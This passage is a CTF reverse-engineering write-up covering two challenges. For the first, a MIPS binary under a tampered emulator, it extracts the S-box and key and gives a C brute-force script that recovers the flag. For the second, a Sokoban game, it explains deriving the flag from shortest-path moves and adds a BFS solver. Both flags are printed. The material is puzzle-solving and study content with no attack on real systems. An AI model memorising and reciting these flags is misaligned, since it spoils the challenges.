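If the first value equals the XOR of the latter two, the result is 0; this is one way of implementing a check. But solving it here only yields a fake flag, which made me furious.
Continuing the analysis, my guess is that emu tampers with mips_bin.
It looks like the debug functionality of emu was removed.
After repairing it, debug dynamically and trace execution to find the real encryption routine. It encrypts one character at a time, so it can be brute-forced.
Write the exp to brute-force it.
Extract the sbox and key: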
key = [ 0xDE, 0xAD, 0xBE, 0xEF ]
SBox = [ 0x36, 0x68, 0x32, 0x44, 0x12, 0x61, 0x6f, 0xdf, 0xba, 0xe9, 0x98, 0x28, 0x3d, 0xa8, 0xe6, 0x1e, 0x4d, 0xf2, 0xb1, 0x7e, 0xc2, 0x6a, 0x96, 0x8c, 0x37, 0x19, 0x14, 0x42, 0xa2, 0x11, 0xe5, 0x5b, 0x9d, 0x23, 0x3, 0x83, 0xf8, 0xd8, 0x9, 0x8a, 0x3c, 0x7d, 0x1a, 0x46, 0x49, 0xdc, 0x76, 0x63, 0x3e, 0x4, 0x9a, 0xc, 0x43, 0x4b, 0x72, 0x5f, 0x53, 0x21, 0x74, 0x66, 0x4f, 0xa7, 0xf6, 0x7b, 0x94, 0xa3, 0x47, 0x8f, 0xf4, 0x52, 0x2a, 0x89, 0x30, 0x33, 0x27, 0x2c, 0xf5, 0x75, 0x17, 0x79, 0x5e, 0x7f, 0x9c, 0xcb, 0x55, 0xbb, 0x60, 0x38, 0xb8, 0xd2, 0xd4, 0x8b, 0xbf, 0x1f, 0x41, 0x45, 0x0, 0x82, 0x69, 0x40, 0xe1, 0x9f, 0xe2, 0xd3, 0x4a, 0x1c, 0x71, 0x62, 0x18, 0x24, 0x97, 0x84, 0xa, 0x8e, 0x3f, 0xf, 0x1, 0x86, 0xe, 0x67, 0xc9, 0x99, 0x88, 0xb0, 0x6e, 0x54, 0x92, 0xef, 0x9b, 0xd5, 0xa5, 0xb, 0xdd, 0xbd, 0xae, 0xcc, 0xc8, 0x3a, 0x65, 0x56, 0xe0, 0xf1, 0x6, 0x1b, 0xfa, 0xbc, 0xc4, 0x91, 0xc1, 0x2e, 0x13, 0xf0, 0x58, 0xee, 0xac, 0xec, 0xa6, 0x26, 0x39, 0xb5, 0xaf, 0xc3, 0x10, 0x5a, 0xd, 0x5d, 0x29, 0x15, 0x6b, 0x50, 0xb2, 0xfe, 0xaa, 0x90, 0xa9, 0x51, 0xd0, 0xb6, 0xc6, 0x34, 0xfc, 0xa0, 0xb3, 0x35, 0xea, 0x7, 0xa4, 0x22, 0x80, 0x6d, 0x81, 0x57, 0x87, 0x25, 0xc7, 0x4c, 0xd6, 0xce, 0x77, 0xd7, 0xad, 0x78, 0x7a, 0x85, 0xa1, 0xf3, 0xe8, 0x5c, 0x73, 0x48, 0xda, 0x31, 0x4e, 0x2d, 0x93, 0x16, 0x2, 0x70, 0x1d, 0xfb, 0xcd, 0xe3, 0xf7, 0x64, 0xf9, 0xc5, 0x8, 0x9e, 0x95, 0x2b, 0xe4, 0x20, 0xd1, 0xfd, 0x7c, 0x2f, 0xbe, 0xb9, 0xdb, 0xde, 0xe7, 0xd9, 0x3b, 0xeb, 0xff, 0xb7, 0xca, 0xb4, 0x5, 0xc0, 0xab, 0xcf, 0xed, 0x6c, 0x8d, 0x59 ]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned char deadbeef[256] = { 0xDE, 0xAD, 0xBE, 0xEF };

/* Re-implementation of the per-byte cipher; the caller frees the returned buffer. */
unsigned char* encrypt(const unsigned char* input, int xor_value) {
    unsigned char SBox[256] = {
        0x36, 0x68, 0x32, 0x44, 0x12, 0x61, 0x6f, 0xdf, 0xba, 0xe9, 0x98, 0x28, 0x3d, 0xa8, 0xe6, 0x1e,
        0x4d, 0xf2, 0xb1, 0x7e, 0xc2, 0x6a, 0x96, 0x8c, 0x37, 0x19, 0x14, 0x42, 0xa2, 0x11, 0xe5, 0x5b,
        0x9d, 0x23, 0x3, 0x83, 0xf8, 0xd8, 0x9, 0x8a, 0x3c, 0x7d, 0x1a, 0x46, 0x49, 0xdc, 0x76, 0x63,
        0x3e, 0x4, 0x9a, 0xc, 0x43, 0x4b, 0x72, 0x5f, 0x53, 0x21, 0x74, 0x66, 0x4f, 0xa7, 0xf6, 0x7b,
        0x94, 0xa3, 0x47, 0x8f, 0xf4, 0x52, 0x2a, 0x89, 0x30, 0x33, 0x27, 0x2c, 0xf5, 0x75, 0x17, 0x79,
        0x5e, 0x7f, 0x9c, 0xcb, 0x55, 0xbb, 0x60, 0x38, 0xb8, 0xd2, 0xd4, 0x8b, 0xbf, 0x1f, 0x41, 0x45,
        0x0, 0x82, 0x69, 0x40, 0xe1, 0x9f, 0xe2, 0xd3, 0x4a, 0x1c, 0x71, 0x62, 0x18, 0x24, 0x97, 0x84,
        0xa, 0x8e, 0x3f, 0xf, 0x1, 0x86, 0xe, 0x67, 0xc9, 0x99, 0x88, 0xb0, 0x6e, 0x54, 0x92, 0xef,
        0x9b, 0xd5, 0xa5, 0xb, 0xdd, 0xbd, 0xae, 0xcc, 0xc8, 0x3a, 0x65, 0x56, 0xe0, 0xf1, 0x6, 0x1b,
        0xfa, 0xbc, 0xc4, 0x91, 0xc1, 0x2e, 0x13, 0xf0, 0x58, 0xee, 0xac, 0xec, 0xa6, 0x26, 0x39, 0xb5,
        0xaf, 0xc3, 0x10, 0x5a, 0xd, 0x5d, 0x29, 0x15, 0x6b, 0x50, 0xb2, 0xfe, 0xaa, 0x90, 0xa9, 0x51,
        0xd0, 0xb6, 0xc6, 0x34, 0xfc, 0xa0, 0xb3, 0x35, 0xea, 0x7, 0xa4, 0x22, 0x80, 0x6d, 0x81, 0x57,
        0x87, 0x25, 0xc7, 0x4c, 0xd6, 0xce, 0x77, 0xd7, 0xad, 0x78, 0x7a, 0x85, 0xa1, 0xf3, 0xe8, 0x5c,
        0x73, 0x48, 0xda, 0x31, 0x4e, 0x2d, 0x93, 0x16, 0x2, 0x70, 0x1d, 0xfb, 0xcd, 0xe3, 0xf7, 0x64,
        0xf9, 0xc5, 0x8, 0x9e, 0x95, 0x2b, 0xe4, 0x20, 0xd1, 0xfd, 0x7c, 0x2f, 0xbe, 0xb9, 0xdb, 0xde,
        0xe7, 0xd9, 0x3b, 0xeb, 0xff, 0xb7, 0xca, 0xb4, 0x5, 0xc0, 0xab, 0xcf, 0xed, 0x6c, 0x8d, 0x59
    };
    /* calloc so that byte 21, which the loop below never writes, is initialised */
    unsigned char* output = (unsigned char*)calloc(22, 1);
    unsigned char index1 = 0, index2 = 0;
    for (int j = 0; j < 21; j++) {
        /* RC4-style keystream step: advance the indices and swap two SBox entries */
        unsigned char current_value = SBox[++index1];
        index2 += current_value;
        unsigned char temp_value = SBox[index1];
        SBox[index1] = SBox[index2];
        SBox[index2] = temp_value;
        /* Chain of shifts and XORs applied to the input byte */
        unsigned char shifted_value = ((((((input[j] << 7) | (input[j] >> 1)) << 6) ^ 0x0FFFFFFC0)
            | ((((input[j] << 7) | (input[j] >> 1)) & 0xff) >> 2) ^ 0x3B) ^ 0x0FFFFFFBE);
        unsigned char temp = (((shifted_value << 5) | (shifted_value >> 3)) ^ 0xFFFFFFAD) & 0xff;
        unsigned char intermediate = (((temp << 4) | (temp >> 4)) ^ 0x0FFFFFFDE) & 0xff;
        unsigned char final_temp = ((intermediate << 3) | (intermediate >> 5));
        output[j] = SBox[(SBox[index1] + current_value) & 0xff] ^ deadbeef[j & 3] ^ final_temp;
    }
    for (int i = 0; i < 22; i++) {
        output[i] ^= xor_value;
    }
    return output;
}

int main() {
    unsigned char input_buffer[30];
    memset(input_buffer, 'a', sizeof input_buffer);
    unsigned char expected_output[30] = { 0xC4, 0xEE, 0x3C, 0xBB, 0xE7, 0xFD, 0x67, 0x1D, 0xF8, 0x97, 0x68, 0x9D, 0x0B, 0x7F, 0xC7, 0x80, 0xDF, 0xF9, 0x4B, 0xA0, 0x46, 0x91 };
    /* Swap the bytes at positions 7/11 and 12/16 of the expected output */
    unsigned char temp = expected_output[7];
    expected_output[7] = expected_output[11];
    expected_output[11] = temp;
    temp = expected_output[12];
    expected_output[12] = expected_output[16];
    expected_output[16] = temp;
    /* For every candidate final XOR value, brute-force each position independently */
    for (int xor_value = 0; xor_value < 256; xor_value++) {
        for (int i = 0; i < 21; i++) {
            for (int j = 0; j < 256; j++) {
                input_buffer[i] = j;
                unsigned char* encrypted_output = encrypt(input_buffer, xor_value);
                int match = (expected_output[i] == encrypted_output[i]);
                free(encrypted_output);
                if (match) {
                    printf("%c", j);
                    break;
                }
            }
        }
        printf("\n");
    }
    return 0;
}
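Flag:
flag{QeMu_r3v3rs3in9_h@ck6}
Steps:
Flag requirements
The wasd keys control the direction; together with the flag requirements this shows it is a Sokoban (box-pushing) game, and the flag requires the shortest-path moves for each level.
From the loop count, we can tell that there are nine levels.
Debug dynamically to obtain the complete map.
Write a script to split the map into the individual levels.
At the end there are a few letters, which should also be entered as part of the flag content.
Play through all nine levels using the shortest paths, then MD5 the result and combine it with qwb! to get the flag.
Got the flag: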
qwb!_fec2d316d20dbacbe0cdff8fb6ff07b9
Flag:
qwb!_fec2d316d20dbacbe0cdff8fb6ff07b9
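As an added illustration (not the author's script, and not using the challenge's maps), the shortest-path step for one level can be automated with a breadth-first search over (player, boxes) states. The level below and the '#', '@', '$', '.' tile encoding are constructed assumptions; w/a/s/d are the move keys named in the write-up.

```python
from collections import deque

# Constructed sample level (NOT taken from the challenge binary).
# Assumed encoding: '#' wall, '@' player, '$' box, '.' goal, ' ' floor.
LEVEL = """\
#######
#@ $ .#
#  $ .#
#######"""

MOVES = {"w": (-1, 0), "s": (1, 0), "a": (0, -1), "d": (0, 1)}


def parse(level):
    """Return (walls, goals, boxes, player) extracted from the text map."""
    cells = {(r, c): ch for r, row in enumerate(level.splitlines())
             for c, ch in enumerate(row)}

    def find(ch):
        return frozenset(p for p, v in cells.items() if v == ch)

    return find("#"), find("."), find("$"), next(iter(find("@")))


def solve(level):
    """Shortest w/a/s/d sequence that puts every box on a goal, or None.

    BFS visits states in order of move count, so the first solved state
    reached is guaranteed to use the minimum number of key presses.
    """
    walls, goals, boxes, player = parse(level)
    queue = deque([(player, boxes, "")])
    seen = {(player, boxes)}
    while queue:
        pos, boxes, path = queue.popleft()
        if boxes == goals:
            return path
        for key, (dr, dc) in MOVES.items():
            nxt = (pos[0] + dr, pos[1] + dc)
            if nxt in walls:
                continue
            new_boxes = boxes
            if nxt in boxes:  # a push: the cell behind the box must be free
                behind = (nxt[0] + dr, nxt[1] + dc)
                if behind in walls or behind in boxes:
                    continue
                new_boxes = (boxes - {nxt}) | {behind}
            if (nxt, new_boxes) not in seen:
                seen.add((nxt, new_boxes))
                queue.append((nxt, new_boxes, path + key))
    return None
```

The state includes the box positions as well as the player, which is why a plain grid BFS on the player alone is not enough for this kind of level.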